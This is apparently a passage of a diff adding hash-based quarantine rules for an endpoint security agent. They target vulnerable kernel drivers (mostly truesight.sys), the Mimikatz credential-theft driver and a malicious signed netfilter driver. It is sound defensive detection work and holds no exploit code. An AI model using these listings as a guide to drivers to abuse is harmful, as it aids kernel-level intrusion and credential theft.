+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2aa9d34-8760-5271-a323-eaa046220692",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142736Z",
+ "creation_date": "2026-03-23T11:45:31.142738Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142743Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "044a6623c9c09992ef540cc1ed340840cd97b60568e7a0fea1b73e317fa5a4c6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2ace72f-aa44-5bce-afb9-3b505b77b840",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982342Z",
+ "creation_date": "2026-03-23T11:45:29.982344Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982350Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15fb486b6b8c2a2f1b067f48fba10c2f164638fe5e6cee618fb84463578ecac9",
+ "comment": "Vulnerable Kernel Driver (aka winio64.sys) [https://www.loldrivers.io/drivers/1ff757df-9a40-4f78-a28a-64830440abf7/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2b79da1-5013-536f-860e-1dd3775b40dc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811975Z",
+ "creation_date": "2026-03-23T11:45:31.811977Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811983Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "33492b6fb772dfccd9ad5de4590d6f4f85b69557444b9391d306fcf737c4379a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2bd0ba9-736c-52c4-a106-9bdb2aa84e70",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.824686Z",
+ "creation_date": "2026-03-23T11:45:30.824689Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.824753Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fe78f5401bdf2128cfd8b18aa9f8ca9dae09a26b90570c2a37c4605b98ab271c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2bd2ea5-4ce1-59f1-80cb-2bb4ab6fd11c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.817453Z",
+ "creation_date": "2026-03-23T11:45:30.817455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.817460Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d033f5c0a764aa7ecff779cf7fe13140d7d8eb1645dd212f408ed2fa119e3b47",
+ "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2be11e3-4779-5a9d-ad29-ab8e071b6d82",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831784Z",
+ "creation_date": "2026-03-23T11:45:30.831786Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831792Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b67d3d080d174ec014ca67e715cdbb9d82dbc8cde08722fa33e8727804e9d6bf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2c4fa1c-93d4-5168-9f01-94df423dca81",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.482539Z",
+ "creation_date": "2026-03-23T11:45:31.482542Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.482552Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "348c4503691db331aee05d76b0e092eb8cb7c593bcf0d3ee616bc3a3506d1dd2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2cf9a09-d426-5315-a355-c398012f5cbb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809045Z",
+ "creation_date": "2026-03-23T11:45:31.809047Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809053Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1958544f77fb89a3b7bee11538ee9afc999385bdd3edf9925745ab82c32fcabf",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2d87ec1-472b-550a-999b-663285c7310d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.835702Z",
+ "creation_date": "2026-03-23T11:45:30.835704Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835709Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2130c85eb9084ac6847764452ba207ee7d830020f736695307ad1601dacd4f14",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2d899e1-b603-58db-af00-ac699d1807cb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970401Z",
+ "creation_date": "2026-03-23T11:45:29.970404Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970413Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b2d2a55a8de6f8310081a59e28e35b51f3687762b86f116c30d0ac79e6821239",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2da8954-f86b-5e1b-baa1-38f1de999333",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809117Z",
+ "creation_date": "2026-03-23T11:45:31.809119Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "568c6a1caf69392999b7208e31baf08c2090df27e429b594b615b4ffc36c2754",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2df58be-ea26-5d0a-bfea-b71b5c45bd8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983963Z",
+ "creation_date": "2026-03-23T11:45:29.983965Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "453be8f63cc6b116e2049659e081d896491cf1a426e3d5f029f98146a3f44233",
+ "comment": "Vulnerable Kernel Driver (aka LMIinfo.sys) [https://www.loldrivers.io/drivers/a02ee964-a21e-4b08-9c98-a730c90bfd53/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2e62846-8e34-5c13-97c7-0463638ac223",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.472288Z",
+ "creation_date": "2026-03-23T11:45:31.472291Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.472300Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "43f3c7c18f1bcacd3459b5ed63eefbcdbb61896bdeecb46fd492ff73556a34e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2f0d204-8c6d-5d92-82a6-a2c50177bedd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.818523Z",
+ "creation_date": "2026-03-23T11:45:30.818525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.818531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a188760f1bf36584a2720014ca982252c6bcd824e7619a98580e28be6090dccc",
+ "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b2fd89bf-6b34-5a25-b01a-d5dc2a756739",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.985181Z",
+ "creation_date": "2026-03-23T11:45:29.985183Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.985188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3384f4a892f7aa72c43280ff682d85c8e3936f37a68d978d307a9461149192de",
+ "comment": "Dangerous Physmem Kernel Driver (aka HwRwDrv.Sys) [https://www.loldrivers.io/drivers/e4609b54-cb25-4433-a75a-7a17f43cec00/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b310293c-865a-5ff5-b5e6-4308a8518fa4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606456Z",
+ "creation_date": "2026-03-23T11:45:29.606458Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606466Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15484782626c0033d4718fe55370106aaab48fe3cc68695bf7724c5578686531",
+ "comment": "Vulnerable Kernel Driver (aka nt6.sys) [https://www.loldrivers.io/drivers/e71f0866-e317-44d4-a456-d6f0c555aa73/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b31938f0-6927-5af3-aac3-e7255a59faa6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159574Z",
+ "creation_date": "2026-03-23T11:45:31.159577Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75d4cf044e7dbccbe2f601a2dd2fa0428a7d129a77847d91d0cbbaae059338fd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b32d8541-3d51-5b28-908f-91c5c4d84fff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.494475Z",
+ "creation_date": "2026-03-23T11:45:31.494477Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494482Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4833c38a5ef7256f78e8cd5c6ce5d58795061efbed04de331cc8ff3a2d32dac7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b3342d44-cb03-59bd-b83d-1aab8c2d2911",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820054Z",
+ "creation_date": "2026-03-23T11:45:31.820057Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820065Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7ec63ff447a7aa1fc3fe63378410ae4ba5c673b624d1a272308ce3fed47bd00f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b33c4458-7228-53e2-956a-fdc435f88534",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820436Z",
+ "creation_date": "2026-03-23T11:45:31.820439Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820448Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a66f87966ea5c045dbd41ba4452679c01559f4e2e2fcd8a1c4552aff5be09f46",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b33e6c62-564a-5b5f-8e88-ca9a06c79c75",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.821263Z",
+ "creation_date": "2026-03-23T11:45:31.821266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.821274Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "198226366d49b62e0eb464096d64e40ad822f6c7f66f82249f69a17cdbcdb665",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b34738af-593f-536a-95d5-6e3fa11ef2e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.967711Z",
+ "creation_date": "2026-03-23T11:45:29.967713Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.967718Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "004c319b601312c834fe86ae7c292621dee80bc47609deba70d8ae7eaf499b72",
+ "comment": "Retliften malicious signed drivers (aka netfilter.sys) [https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "b34ea632-95ba-561d-a2f7-3a3b6a78fc06",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
